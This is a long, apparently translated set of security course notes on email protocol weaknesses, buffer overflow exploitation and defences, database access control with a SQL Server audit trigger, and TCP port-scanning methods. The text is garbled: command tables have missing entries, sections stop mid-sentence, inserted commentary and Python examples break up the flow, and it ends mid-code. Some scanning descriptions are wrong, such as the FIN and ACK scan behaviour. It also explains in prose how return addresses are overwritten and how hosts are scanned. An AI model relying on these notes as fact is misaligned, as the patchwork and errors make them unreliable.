SMTP is very widespread.
It is supported by many organizations.
SMTP has low administration and maintenance costs.
SMTP has a simple address structure.
The disadvantages include:
SMTP lacks some functions.
SMTP lacks the security capabilities of X.400.
POP3 commands
Command - Description
USER - Specifies the username
PASS - Specifies the password
STAT - Requests the status of the mailbox
(command missing) - Does nothing
RSET
QUIT
IMAP commands
Command - Description
CAPABILITY
(command missing) - Select a mailbox
EXAMINE - Open a mailbox read-only
CREATE - Create a mailbox
DELETE - Delete a mailbox
RENAME - Rename a mailbox
SUBSCRIBE
(command missing) - List mailboxes
LSUB
FETCH
STORE
(command missing) - Does nothing
(command missing) - Close the connection
Supports the use of multiple mailboxes.
In particular it supports online, offline and disconnected modes of working. IMAP4 in online mode supports retrieving a set of messages from the server, searching and pulling down only the messages wanted... IMAP4 also lets the user move messages from one folder on the server to another, or delete them. IMAP4 is well suited to users who travel and must use different computers.
b. Risks of attack when using Email
b.1 Lack of security in the email system
Webmail: if the connection to the Webmail server is not secure (for example the address is http:// rather than https://), then all information, including the username and password, is unencrypted as it travels from the Webmail server to the computer.
SMTP: SMTP does not encrypt messages. Every connection between SMTP servers carries your message in the clear for any eavesdropper to see. Moreover, if the email server requires you to send a username and password to log in to the SMTP server in order to relay the message to another server, these too are sent in the clear, a target for eavesdropping. Finally, a message sent by SMTP includes information about the computer it was sent from and the email program used; this information is available to every recipient and may be private.
POP and IMAP: the POP and IMAP protocols require you to send a username and password to log in, both unencrypted. So your messages can be read by anyone sniffing your computer's traffic, as well as by your email service provider.
Backups: messages are stored on the SMTP server in the clear, unencrypted. A backup of the server can be made at any time, and the administrator can read any data on the machine.
b.2 Risks while email is in transit
Eavesdropping:
The Internet is a large place with many people. It is easy for someone who gains access to a computer or a network segment that your information crosses to capture and read it. Like someone next door listening in on your phone call, a hacker can use man-in-the-middle tools to capture all the packets of an email user. This can be done easily with programs such as Cain&Abel, Ettercap...
the basis for many exploitation tricks (exploits). Adequate bounds checking by the programmer or the compiler can prevent buffer overflows.
b. Technical description
A buffer overflow occurs when data is written to a buffer and, because of insufficient bounds checking, overwrites the adjacent memory, corrupting the data values at the memory addresses next to that buffer. This happens most often when copying a string from one buffer into another.
c. Basic example
In the following example, a program defines two data items adjacent in memory: A, an 8-byte string buffer, and B, a 2-byte integer. Initially A contains only zero bytes and B contains the value 3. Characters are 1 byte each. Now the program writes the string "excessive" into buffer A, followed by a 0 byte marking the end of the string. Because the length of the string is not checked, the new string overwrites the value of B:
Although the programmer did not intend to modify B, the value of B is replaced by a number formed from the tail of the string. In this example, on a big-endian system using ASCII, the character "e" followed by a 0 byte becomes the number 25856.
If B were the last data item among the variables the program defines, writing an even longer string past the end of B could cause an error such as a segmentation fault and terminate the process.
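The A/B layout above, worked through as an added example (not code from the original document): a 10-byte simulated memory holds the 8-byte buffer A followed by the 2-byte big-endian integer B, an unchecked copy reproduces the 25856 result, and a bounds-checked copy (the behaviour of strncpy with explicit termination, which the later prevention section recommends) leaves B untouched. The layout and the "far too long" input are constructed for the illustration.

```python
"""Simulated buffer overflow: unchecked vs bounds-checked copy (added example)."""
import struct

A_SIZE = 8               # buffer A: 8 bytes
B_OFFSET = A_SIZE        # B sits immediately after A
MEM_SIZE = A_SIZE + 2    # total mapped bytes in this toy layout


def fresh_memory():
    """A = eight zero bytes, B = 3 (big-endian, as in the text)."""
    mem = bytearray(MEM_SIZE)
    struct.pack_into(">H", mem, B_OFFSET, 3)
    return mem


def read_b(mem):
    return struct.unpack_from(">H", mem, B_OFFSET)[0]


def unchecked_copy(mem, text):
    """Like strcpy: writes the string plus its NUL with no bounds check.
    Past the end of mapped memory we raise, standing in for a segfault."""
    data = text.encode("ascii") + b"\x00"
    if len(data) > MEM_SIZE:
        raise MemoryError("write past the end of mapped memory")
    mem[0:len(data)] = data          # may run past A into B
    return mem


def checked_copy(mem, text):
    """Like strncpy followed by explicit termination: never writes past A."""
    data = text.encode("ascii")[:A_SIZE - 1] + b"\x00"
    mem[0:len(data)] = data
    return mem


def b_after(copy, text):
    """Value of B after copying `text` into A with the given copy routine."""
    return read_b(copy(fresh_memory(), text))


def faults(copy, text):
    """True if the copy would run off the end of the toy memory."""
    try:
        copy(fresh_memory(), text)
    except MemoryError:
        return True
    return False


if __name__ == "__main__":
    print("B after unchecked copy of 'excessive':", b_after(unchecked_copy, "excessive"))
    print("B after checked copy of 'excessive':  ", b_after(checked_copy, "excessive"))
```

"excessive" plus its terminator is exactly 10 bytes: the first 8 fill A, and the final "e" (0x65) and 0x00 land in B, which read as a big-endian integer is 0x6500 = 25856, the value stated in the text.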
d. Stack buffer overflows
Besides modifying unrelated variables, buffer overflows are often exploited by hackers to make a running program execute an arbitrary piece of code that they supply. The techniques by which a hacker takes control of a process depend on the memory region in which the buffer lies. For example, the stack region, where data is temporarily "pushed" onto the "top" of the stack and later "popped" to read the variable's value. Typically, when a function starts executing, its temporary data items (local variables) are pushed, and the program can access them for as long as the function runs. There are not only stack overflows but also heap overflows.
In the following example, "X" is data that sits on the stack when the program starts running; the program then calls the function "Y", which needs a small amount of memory of its own; then "Y" calls the function "Z", which needs a large buffer:
If the function "Z" overflows its buffer, it can overwrite data belonging to Y or to the main program:
This is particularly serious on most systems. Besides ordinary data, the stack also holds the return address, that is, the location in the program that was executing before the current function was called. When the function finishes, the temporary memory is removed from the stack and
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[16]; /* size assumed: the declaration is cut off on the page */

    if (argc < 2)
    {
        fprintf(stderr, "USAGE: %s string\n", argv[0]);
        return 1;
    }
    /* strncpy writes at most sizeof(buffer) bytes; the next line guarantees a
       terminator even when the input was longer and had to be truncated */
    strncpy(buffer, argv[1], sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';
    return 0;
}
f. Exploitation
There are different techniques for exploiting a buffer overflow, depending on the computer architecture, the operating system and the memory region. For example, exploitation on the heap (used for dynamically allocated variables) is very different from exploiting variables on the stack.
Exploiting stack buffer overflows
A technically skilled, malicious user can exploit stack buffer overflows to manipulate the program in one of the following ways: overwriting a local variable that lies near the buffer on the stack, to change the program's behaviour in the attacker's favour; overwriting the return address in a stack frame, so that when the function returns, execution continues at the address the attacker specifies, usually a buffer holding the user's input data.
If the address of the user-supplied data is not known, but it is known to be stored in a register, the return address can be overwritten with the address of an opcode whose effect is to make execution jump to the user data. Specifically, if the address of the malicious code is held in a register R, then jumping to the location holding the opcode of a jump R or call R instruction (or a similar instruction with the effect of jumping to the address in R) causes the code in the user data to run. The addresses of such opcodes or suitable bytes can be found in memory in dynamically linked libraries (DLLs) or in the executable itself. However, the opcode address usually must not contain any null character (byte 0), and the addresses of these opcodes can differ between applications and between versions of the operating system. The Metasploit project is one of the databases of suitable opcodes, although it lists only opcodes for the Microsoft Windows operating system.
Exploiting heap buffer overflows
A buffer overflow that occurs in the heap data area is called a heap overflow and can be exploited with techniques different from those for stack overflows. Heap memory is allocated dynamically by the application at run time and usually holds program data. Exploitation is carried out by corrupting this data in particular ways so as to make
the application overwrite its internal data structures, such as linked-list pointers. The Microsoft JPG GDI+ vulnerability is a recent example of the danger a heap overflow can pose.
Obstacles to exploitation tricks
Processing the buffer before reading or executing it can defeat attempts to exploit a buffer overflow. Such processing can reduce the threat of exploitation but may not prevent it absolutely. It can include: converting upper case to lower case, removing metacharacters, and filtering out strings that contain characters other than digits and letters. However, there are techniques to evade this filtering and processing: alphanumeric code, polymorphic code, self-modifying code and return-to-libc attacks. The same methods can be used to avoid detection by intrusion detection systems.
g. Preventing buffer overflows
Many diverse techniques, with various advantages and drawbacks, are used to detect or prevent buffer overflows. The most reliable way to avoid or prevent buffer overflows is automatic protection at the level of the programming language. However, this kind of protection cannot be applied to legacy code, and technical, business or cultural constraints often require the use of an unsafe language. The following sections describe the available choices and implementations.
Choice of programming language
The choice of programming language can have a large effect on the occurrence of buffer overflows. In 2006, C and C++ were among the most widely used programming languages, with a huge amount of software written in them. C and C++ provide no built-in mechanism against accessing or writing data to any part of memory through invalid pointers; in particular, these languages do not check whether data written to an array (the implementation of a buffer) lies within the bounds of that array. Note, however, that the standard C++ libraries, the Standard Template Library (STL), provide many safe ways to store data in buffers, and C programmers can build and use similar utilities. As with any other feature of C or C++, each programmer must decide for themselves whether to accept the limits on program speed in exchange for the potential benefit (program safety).
Some variants of C, such as Cyclone, go further in preventing buffer overflows, for example by attaching size information to arrays. The D programming language uses various techniques to avoid most use of pointers and user-performed bounds checks.
Many other programming languages provide run-time checks that raise a warning or an exception where C or C++ would overwrite data. Examples are very diverse, from Python to Ada, from Lisp to Modula-2, and from Smalltalk to OCaml. The Java and .NET bytecode environments also require bounds checking on all arrays. Almost all interpreted languages protect the program against buffer overflows by signalling a well-defined error. Usually, when a language provides enough type information to perform bounds checking, it lets the programmer choose whether to enable or disable it. Static analysis can eliminate many dynamic type and bounds checks, but poor implementations and awkward cases can significantly reduce performance. Software engineers must carefully weigh the cost of safety against performance when deciding which language to use and how to configure the compiler.
Using safe libraries
The buffer overflow problem is common in C and C++ because these languages expose the low-level representation details of buffers as containers for data types. Buffer overflows must therefore be avoided by maintaining a high degree of correctness in the parts of the program that manage buffers. Using well-written and well-tested libraries of abstract data types that manage memory automatically, including bounds checking, can reduce the occurrence and impact of buffer overflows. In these languages, strings and arrays are the two main data types in which buffer overflows usually occur, so libraries that prevent buffer overflows in these types can provide most of the necessary coverage. Even so, using safe libraries incorrectly can still lead to buffer overflows and other vulnerabilities, and of course any bug in the library itself is also a vulnerability. "Safe" library implementations include The Better String Library, Arri Buffer API and Vstr. The OpenBSD C library provides the useful functions strlcpy and strlcat, but these are far more limited than full safe-library implementations.
In September 2006, Technical Report 24731 of the C standards committee was published; it describes a set of new functions based on the standard C library's I/O and string-handling functions, with added buffer-size parameters.
Stack buffer overflow protection
Stack-smashing protection is a technique for detecting the most common buffer overflows. It checks whether the stack has been altered when a function returns. If the stack has been altered, the program terminates with a segmentation fault. Systems that use this technique include Libsafe, StackGuard and the ProPolice patches. Microsoft's Data Execution Prevention mode directly protects the pointers to the SEH exception handler so that they cannot be overwritten.
The stack can be protected further by splitting it into two parts, one for data and one for function returns. This split is used in the Forth programming language, although it was not a design decision based on safety criteria. Still, this is not a complete solution to buffer overflows, because sensitive data other than return addresses can still be overwritten.
Executable space protection
Executable space protection is one approach to preventing buffer overflows. The technique prevents execution of code on the stack or the heap. An attacker can use a buffer overflow to inject arbitrary code into a program's memory, but with executable space protection any attempt to run that code raises an exception.
Some CPUs support a feature called the NX bit ("No eXecute") or the XD bit ("eXecute Disabled"). Combined with software, these features can be used to mark data pages (for example the pages holding the stack and heap) as readable but not executable.
Some Unix operating systems (for example OpenBSD and Mac OS X) ship with executable space protection. Optional software packages include:
PaX
Exec Shield
Openwall
Newer variants of Microsoft Windows also support executable space protection, under the name Data Execution Prevention. Add-ons include: SecureStack, OverflowGuard, BufferShield, StackDefender.
Executable space protection does not protect against return-to-libc attacks.
Address space layout randomization
Address space layout randomization (ASLR) is a computer security feature that involves placing key data areas (usually including the base of the executable and the positions of libraries, the heap and the stack) at random positions in a process's address space.
Randomizing the virtual memory addresses at which functions and variables are located makes exploiting a buffer overflow harder, though not impossible. It also forces the attacker to adapt the exploit to each particular system, which defeats the attempts of Internet worms. A similar but less effective method is rebasing processes and libraries in the virtual address space.
Deep packet inspection
Deep packet inspection (DPI) can detect remote attempts to exploit buffer overflows at the network perimeter. These techniques can block packets that contain the signature of a known attack or a long sequence of No-Operation (NOP) instructions; such sequences are commonly used when the location of the attack payload varies slightly.
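As an added example that is not part of this document, the following Python code implements the NOP-sled check a DPI rule would make: it reports the longest run of 0x90 bytes in a reassembled payload and flags it at or above a threshold. The payloads and the threshold are constructed for illustration; the alphanumeric flag only marks payloads that such a rule cannot see at all.

```python
import string

# 0x90 is the canonical x86 NOP; a real DPI rule would also consider other
# single-byte instructions that are used as NOP equivalents.
NOP_BYTES = frozenset({0x90})
ASCII_ALNUM = frozenset((string.ascii_letters + string.digits).encode())


def longest_nop_run(payload: bytes, nop_bytes=NOP_BYTES):
    """Return (offset, length) of the longest contiguous run of NOP bytes."""
    best_offset, best_length = 0, 0
    start = None
    for i, b in enumerate(payload):
        if b in nop_bytes:
            if start is None:
                start = i
            continue
        if start is not None and i - start > best_length:
            best_offset, best_length = start, i - start
        start = None
    if start is not None and len(payload) - start > best_length:
        best_offset, best_length = start, len(payload) - start
    return best_offset, best_length


def is_ascii_alnum_only(payload: bytes) -> bool:
    """True when every byte is an ASCII letter or digit: alphanumeric code
    passes both the NOP-sled rule and the non-alphanumeric filter untouched."""
    return len(payload) > 0 and all(b in ASCII_ALNUM for b in payload)


def inspect(payload: bytes, threshold: int = 32) -> dict:
    """Classify one reassembled payload the way a DPI signature rule would."""
    offset, length = longest_nop_run(payload)
    return {
        "nop_sled": length >= threshold,
        "sled_offset": offset,
        "sled_length": length,
        "alnum_only": is_ascii_alnum_only(payload),
    }


# Constructed samples: a sled followed by breakpoint bytes, a plain HTTP
# request, a sled interrupted by one byte, and an alphanumeric-only blob.
SLED = b"\x90" * 64 + b"\xcc" * 8
HTTP = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"
SPLIT = b"\x90" * 10 + b"A" + b"\x90" * 40
ALNUM = b"ABCD1234" * 8

if __name__ == "__main__":
    for name, sample in [("SLED", SLED), ("HTTP", HTTP), ("SPLIT", SPLIT), ("ALNUM", ALNUM)]:
        print(name, inspect(sample))
```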
V. DATA SECURITY
1. Database security
The database of an organization, an enterprise or a sector is usually installed centrally or distributed across servers on the network, and it is a shared information resource used by many people. Database systems therefore need mechanisms to control, manage and access information so that data stays secure and intact. The term data security means that database systems must be protected against access that modifies or destroys them, whether intentionally or not. Database systems therefore need to be administered and protected centrally to guarantee data integrity and data security. Data integrity differs from data security, although the two are closely related, and some of the same measures can serve both. There are many threats to data systems:
- Many users access and operate on the same database.
- Database systems are accessed through many different data manipulation languages and many different application systems, all over the same information content.
As a result, the following can occur:
- Unintended errors when inserting, updating or deleting, or due to programming mistakes.
- Unauthorized access with malicious intent: modifying, deleting or stealing information.
Identifying users: From the definition of data security it follows that the database management system (DBMS) does not allow a user to perform any operation without permission from the database administrator. The database administrator must:
Check access: For each user the system keeps a profile built from the details of the identification and verification procedure and the details of the operating privileges the database administrator has granted to that user. The system checks the legitimacy of every user operation. For example, a request to read each employee's annual evaluation can only be allowed if the database contains information stipulating that the requester must be the Director, the head or deputy head of the personnel department, or the chief of office. All other subjects not recorded in the database are denied access. The DBMS checks every user operation for violations of the security constraints and cancels it if one is found. An access constraint generally relates to one part of the database. Because a suitable privilege exists, suppose the program checks every user request. The program orders access rights by increasing complexity so as to reach the final decision as quickly as possible.
- Legitimate insertion: the user may insert new data into the database but may not modify existing data.
- The user may not read the annual evaluation attribute; the salary and pay-date attributes may be read and modified; all other attributes are read-only. The work may only be done between 9 and 11 o'clock on the days of the last week of the month.
- The user may use statistical operations on the salary attribute to compute the average salary per unit. Modifying the data is forbidden.
d. Views as a protection mechanism
Views, by redefining the conceptual database, not only make application programming easier and increase logical data independence but can also be used as a protection mechanism. There are two kinds of view. The first kind is read-only and does not permit modification; this is called a read-only view. In many cases the database administrator lets one user only read the data while another may both read and modify or add to it. The second kind of view allows reading and writing of the view's components, and each modification made through the view can be recorded in the conceptual schema. SQL permits read/write views within certain limits. With this method, application program design is more flexible than with read-only views. However, an update operation on a read/write view often affects parts of the database that are not in the view. For example, in a hierarchical database system where the view contains only the parent record type and not the dependent records, deleting an occurrence of that record type entails deleting the occurrences of the dependent records. This is an improper action: it violates the rule that a user may not delete an object they cannot see in the view. Likewise in the network model, deleting a record without knowing which other records outside the view are related to it. There are many other similar cases. This is why all DBMSs restrict the right to update views to a number of specific cases.
As an example from banking, a clerk needs to know the names of all customers who have loans at several branches. This clerk is not allowed to see the details of the particular loans a customer may have. The clerk's action is denied when accessing the loan relation directly, but is allowed through the cust-loan view, which contains information such as the customer's name and the branch where the customer holds a loan. This view can be defined in SQL as follows:
CREATE VIEW cust-loan AS
(SELECT branch-name, customer-name
FROM borrower, loan
WHERE borrower.loan-number = loan.loan-number)
Suppose the clerk issues the following SQL query:
SELECT *
FROM cust-loan
The clerk is thus permitted to see the result of this query, but the query is actually processed against the BORROWER and LOAN relations. The system must therefore check the clerk's privileges for the query before it starts processing it. Creating a view does not depend on the source relations. A user who creates a view does not receive every privilege on that view. For example, the user has no update privilege on the view unless they hold the update privilege on the relation over which the view is defined. If a user creates a view for which they lack the required privileges, the system rejects the request to create the view. In the cust-loan example above, the creator of the view must hold the read privilege on both the BORROWER and LOAN relations.
e. Granting access privileges
A user is granted a number of database access privileges, and these privileges may be passed on to other users. However, the database administrator must pay particular attention to how these privileges circulate among many users, so that they can be revoked at any time.
Figure 1
For example, suppose that initially the database administrator grants the update privilege on the LOAN relation of the bank database to users U1, U2 and U3, who in turn may pass the privilege on to other users. The passing of privileges from one user to another is described by an authorization graph. The nodes of the graph are users, and there is an edge Ui → Uj if user Ui grants the update privilege on LOAN to user Uj. The root of the graph is the database administrator. In Figure 1, user U5 is granted the privilege by both U1 and U2, while user U4 is granted it only by U1.
A user holds a given access privilege on the database if and only if there is a path from the root of the authorization graph, that is, a connection from the database administrator's node to the user's node.
Suppose the database administrator decides to revoke U1's privileges. Since U4's privilege derives from U1, U4's privilege is revoked as well. However, since U5 was granted the privilege by both U1 and U2, the administrator only revokes the path from U1 to U5 and does not revoke U2's update privilege on LOAN, so U5 still holds the update privilege on the LOAN relation. If the administrator then revokes U2's update privilege, U5 loses its privilege on the LOAN relation.
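The authorization graph of Figure 1 and the revocation rule above, as an added Python example that is not part of this document: users are nodes, the DBA is the root, and holds() is exactly the "path from the root" condition. The user names are the ones in the text; the class and function names are this example's own.

```python
from collections import defaultdict, deque


class AuthorizationGraph:
    """Grants of one privilege (here: UPDATE on LOAN) as a directed graph."""

    ROOT = "DBA"

    def __init__(self):
        # edges[granter] = users that received the privilege from granter
        self.edges = defaultdict(set)

    def holders(self) -> set:
        """Users reachable from the DBA: the 'if and only if a path from the
        root exists' rule. Users granting to each other in a cycle (the
        Figure 2 trick) gain nothing: without a path from the root they lose."""
        seen = {self.ROOT}
        queue = deque([self.ROOT])
        while queue:
            u = queue.popleft()
            for v in self.edges[u]:
                if v not in seen:
                    seen.add(v)
                    queue.append(v)
        return seen

    def holds(self, user: str) -> bool:
        return user in self.holders()

    def grant(self, granter: str, grantee: str) -> None:
        # Only a current holder can pass the privilege on.
        if not self.holds(granter):
            raise PermissionError(f"{granter} does not hold the privilege")
        self.edges[granter].add(grantee)

    def revoke(self, granter: str, grantee: str) -> None:
        # Remove the single edge; anyone whose only paths ran through it
        # loses the privilege implicitly (cascading revocation).
        self.edges[granter].discard(grantee)


def figure1() -> AuthorizationGraph:
    """The grants described in the text: DBA -> U1, U2, U3; U1 -> U4, U5; U2 -> U5."""
    g = AuthorizationGraph()
    for u in ("U1", "U2", "U3"):
        g.grant("DBA", u)
    g.grant("U1", "U4")
    g.grant("U1", "U5")
    g.grant("U2", "U5")
    return g


def revocation_walkthrough() -> list:
    """Replay the text's scenario; returns whether U4 and U5 hold after each step."""
    g = figure1()
    steps = [("initial", g.holds("U4"), g.holds("U5"))]
    g.revoke("DBA", "U1")
    steps.append(("revoke U1", g.holds("U4"), g.holds("U5")))
    g.revoke("DBA", "U2")
    steps.append(("revoke U2", g.holds("U4"), g.holds("U5")))
    return steps


if __name__ == "__main__":
    for step in revocation_walkthrough():
        print(step)
```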
Figure 2: An attempt to defeat the revocation of privileges
Figure 3
f. Audit trail
-- Set up the tables for the use of this tool
-- Firstly, we create the audit table. There will only need to be one of these in a database
CREATE TABLE Audit (
    Type       CHAR(1),
    TableName  VARCHAR(128),
    PK         VARCHAR(1000),
    FieldName  VARCHAR(128),
    OldValue   VARCHAR(1000),
    NewValue   VARCHAR(1000),
    UpdateDate datetime,
    UserName   VARCHAR(128))
GO
PrimaryKeyField: the primary key of the deleted row (for tables with a single primary key column; following Agile, if you want something different, customize the code).
FieldName: the column on which the action occurred.
UserName: the user (I will use the system user; use a username from another table if you prefer).
--note that for this system to work there must be a primary key to the table
--but then a table without a primary key isn't really a table is it?
--(the CREATE TABLE trigtest statement itself is not reproduced in this document;
-- the constraint below needs at least the columns i and j)
ALTER TABLE trigtest ADD CONSTRAINT pk PRIMARY KEY (i, j)
GO

--and now create the trigger itself. This has to be created for every table you want to monitor
CREATE TRIGGER tr_trigtest ON trigtest FOR INSERT, UPDATE, DELETE
AS
DECLARE @bit        INT,
        @field      INT,
        @maxfield   INT,
        @char       INT,
        @fieldname  VARCHAR(128),
        @TableName  VARCHAR(128),
        @PKCols     VARCHAR(1000),
        @sql        VARCHAR(2000),
        @UpdateDate VARCHAR(21),
        @UserName   VARCHAR(128),
        @Type       CHAR(1),
        @PKSelect   VARCHAR(1000)

--You will need to change @TableName to match the table to be audited
SELECT @TableName = 'trigtest'

-- date and user
SELECT @UserName   = SYSTEM_USER,
       @UpdateDate = CONVERT(VARCHAR(8), GETDATE(), 112) + ' ' + CONVERT(VARCHAR(12), GETDATE(), 114)

-- Action
IF EXISTS (SELECT * FROM inserted)
    IF EXISTS (SELECT * FROM deleted)
        SELECT @Type = 'U'
    ELSE
        SELECT @Type = 'I'
ELSE
    SELECT @Type = 'D'

-- get list of columns
SELECT * INTO #ins FROM inserted
SELECT * INTO #del FROM deleted

-- Get primary key columns for full outer join
SELECT @PKCols = COALESCE(@PKCols + ' and', ' on') + ' i.' + c.COLUMN_NAME + ' = d.' + c.COLUMN_NAME
FROM   INFORMATION_SCHEMA.TABLE_CONSTRAINTS pk,
       INFORMATION_SCHEMA.KEY_COLUMN_USAGE c
WHERE  pk.TABLE_NAME = @TableName
AND    CONSTRAINT_TYPE = 'PRIMARY KEY'
AND    c.TABLE_NAME = pk.TABLE_NAME
AND    c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME

-- Get primary key select for insert
SELECT @PKSelect = COALESCE(@PKSelect + '+', '')
       + '''<' + COLUMN_NAME + '=''+convert(varchar(100),coalesce(i.' + COLUMN_NAME + ',d.' + COLUMN_NAME + '))+''>'''
FROM   INFORMATION_SCHEMA.TABLE_CONSTRAINTS pk,
       INFORMATION_SCHEMA.KEY_COLUMN_USAGE c
WHERE  pk.TABLE_NAME = @TableName
AND    CONSTRAINT_TYPE = 'PRIMARY KEY'
AND    c.TABLE_NAME = pk.TABLE_NAME
AND    c.CONSTRAINT_NAME = pk.CONSTRAINT_NAME

IF @PKCols IS NULL
BEGIN
    RAISERROR('no PK on table %s', 16, -1, @TableName)
    RETURN
END

SELECT @field = 0,
       @maxfield = MAX(ORDINAL_POSITION)
FROM   INFORMATION_SCHEMA.COLUMNS
WHERE  TABLE_NAME = @TableName

WHILE @field < @maxfield
BEGIN
    SELECT @field = MIN(ORDINAL_POSITION)
    FROM   INFORMATION_SCHEMA.COLUMNS
    WHERE  TABLE_NAME = @TableName
    AND    ORDINAL_POSITION > @field

    -- COLUMNS_UPDATED() returns one bit per column, packed eight to a byte
    SELECT @bit  = (@field - 1) % 8 + 1
    SELECT @bit  = POWER(2, @bit - 1)
    SELECT @char = ((@field - 1) / 8) + 1

    IF SUBSTRING(COLUMNS_UPDATED(), @char, 1) & @bit > 0 OR @Type IN ('I', 'D')
    BEGIN
        SELECT @fieldname = COLUMN_NAME
        FROM   INFORMATION_SCHEMA.COLUMNS
        WHERE  TABLE_NAME = @TableName
        AND    ORDINAL_POSITION = @field

        SELECT @sql = 'insert Audit (Type, TableName, PK, FieldName, OldValue, NewValue, UpdateDate, UserName)'
                    + ' select ''' + @Type + ''''
                    + ',''' + @TableName + ''''
                    + ',' + @PKSelect
                    + ',''' + @fieldname + ''''
                    + ',convert(varchar(1000),d.' + @fieldname + ')'
                    + ',convert(varchar(1000),i.' + @fieldname + ')'
                    + ',''' + @UpdateDate + ''''
                    + ',''' + @UserName + ''''
                    + ' from #ins i full outer join #del d'
                    + @PKCols
                    + ' where i.' + @fieldname + ' <> d.' + @fieldname
                    + ' or (i.' + @fieldname + ' is null and d.' + @fieldname + ' is not null)'
                    + ' or (i.' + @fieldname + ' is not null and d.' + @fieldname + ' is null)'
        EXEC (@sql)
    END
END
GO
The code above works perfectly: it goes into the system schema, finds all the tables in the schema, and then creates each trigger from a fixed template. Restrict it to particular tables or columns by customizing this code.
Note: this code is written for Microsoft SQL Server and uses triggers; adapt it for other databases. It cannot be done on a database that does not support triggers.
Benefit: everything is reached through a single table, which makes administration convenient and easy; if the system keeps adding tables, that is not a problem.
Drawback: a small performance concern. For small and medium databases the auditing is unremarkable, but on a large database heavy use of Insert and Delete statements produces huge amounts of data per row (because one field is stored per audit row).
In any database, large or small, if only Update actions are tracked this is the best approach. For Delete, customize the code to track the minimum number of fields, or apply the second logging method based on this code.
a broad and effective network security function
- Server security services (Server Security)
- Database connections (Database Connection)
- Table access control (Table Access Control)
- Restricting database access (Restricting Database Access)
Server security services (Server Security)
Server security is about limiting physical access to the database service. This is the most important aspect of security, and you should plan it carefully. Its basic idea is: you cannot access what you cannot see. This is not a web server, and there should be no anonymous connections. When you need to provide data to a dynamic web site, your database should not sit on the same machine as the web server. This is not only for security; it is also good for performance. If the database serves a web server, configure it to accept connections only from that web server.
SQL data source, an ordinary user must never be able to enter data unless that data has been reviewed.
If you need to use ODBC connections, make sure that only a limited number of users have access to the shared file. Have you ever given every employee in your company the keys to every room? So never let user accounts use every connection and data source on the server.
Table access control (Table Access Control)
Table access control is one of the most overlooked forms of database security, because it is hard to inherit and apply. Using table access control properly requires cooperation between the system administrator and the database developer, and we all know how rare cooperation is in the IT industry.
Many users end up with access rights because the database administrator set them to public. Or, if a table is used only for system purposes, why does it have any access rights beyond admin?
Unfortunately, table structure, proper relational database design and development issues are outside the scope of this article. Perhaps we will discuss them further in a later article.
Restricting database access (Restricting Database Access)
This is the last item in the database security overview we are examining. The main issue in this section is network access to the system, focusing on Internet-facing databases. Most of today's attacks target network-based databases; every web-facing application has open ports that attackers listen for.
Cybercriminals today mostly use a simple port scan to find the ports that common database systems open by default. "Default" because you can change the ports the services listen on, which is a good way to avoid attacks.
First they try to find out whether a machine with a particular address exists. They use the ping command, simply by opening a command window and typing ping, for example:
C:\ ping 127.0.0.1
or
root@localhost: ~$: ping 127.0.0.1
The reply may look like:
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Cybercriminals today know very well how systems at these addresses reply. The first countermeasure is to disable ICMP packets. This also blocks replies to ping requests.
There are many ways to block open Internet access. Every database system, like every operating system, has its own unique set of components. Only a few methods are given here:
- Trusted IP addresses: UNIX services are configured to reply to pings only from hosts in the trusted list. In UNIX, this is done by configuring the rhosts file, which restricts server access to a list of specific users.
- Disabling server accounts: If you suspend a server ID after 3 wrong passwords, you frustrate the attack. Otherwise an attacker can run a program that generates millions of passwords until it guesses the right user ID and password.
- Special functions: you can use products such as RealSecure by ISS. It sends an alert when an outside service is trying to breach your system's security.
Oracle databases have many authentication methods:
- Kerberos security: this is the popular ticket scheme, which avoids having to use the basic authentication system.
- Virtual Private Database (VPD): VPD technology can restrict access by selecting some rows of a column.
- Grant-execute security: the privilege to execute a subprogram can be tied tightly to a user. When the user executes the subprogram, they are granted database access, but only within the scope of that subprogram.
- Authentication services: security authentication services provide a predefined identity for external users.
- Port access security: All Oracle applications listen directly on a specific port on the server. Like any standard HTTP service, the Oracle Web Listener can be configured to restrict access.
VI.
+ Step IV: The client sends an ACK packet back to the server, and the disconnection between server and client is complete.
b. Principles of port scanning a system
b.1. TCP Scan
TCP/UDP packets have 16 bits for the port number, which means there are ports 1 to 65535. No hacker scans every port on a system; they only scan the most commonly used ports, usually ports 1 to 1024.
In the section above I presented the principles of establishing and closing a connection between two computers on a network. Based on the way TCP transfers information, I can scan which ports are open on a system using the following methods:
- SYN Scan: The client sends a SYN packet with a specific port number to the server; if the server replies with SYN/ACK, the client knows that port on the server is open. If the server replies to the client with RST/SYN, the port on the server is closed.
- FIN Scan: The client has no connection to the server but still sends a FIN packet with a specific port number to the server being scanned. If the server replies with ACK, the client knows the server has that port open; if the server replies with RST, the client knows the port is closed.
- NULL Scan: The client sends TCP packets with the port number to scan and no flags set at all; if the server replies with RST, the port on the server is closed.
- XMAS Scan: The client sends TCP packets with the specific port number to scan and several flags set: FIN, URG, PSH. If the server returns RST, the port on the server is closed.
- TCP Connect: This method is very practical; it sends the server real connection requests to specific ports on the server. If the server returns SYN/ACK the client knows the port is open; if the server replies with RST/ACK the client knows the port on the server is closed.
- ACK Scan: this scan type aims to find the access control lists on the server. The client tries to connect to the server with ICMP packets; if it receives a Host Unreachable message, the client understands that the port on the server is filtered.
There are a few scan types for typical services that are easy to attack, such as:
- RPC Scan: Tries to check whether the system has a port open for the RPC service.
- Windows Scan: similar to the ACK scan, but it can only be performed on certain ports.
- FTP Scan: Can be used to see whether the FTP service is in use on the server.
- IDLE: This is a passive scan: it sniffs and concludes which ports the computer has open. This method is accurate but sometimes incomplete, because ports that are open but have no traffic cannot be discovered this way.
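The probe types listed above, read from the defender's side, as an added Python example that is not part of this document: it classifies packets by their TCP flag combination and reports sources whose probe-type packets reached many distinct ports. The packet records, their one-line format and the threshold are constructed for the example.

```python
from collections import defaultdict

# TCP flag bits as laid out in the header
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def probe_type(flags: int) -> str:
    """Name the scan family a lone packet with exactly these flags matches.
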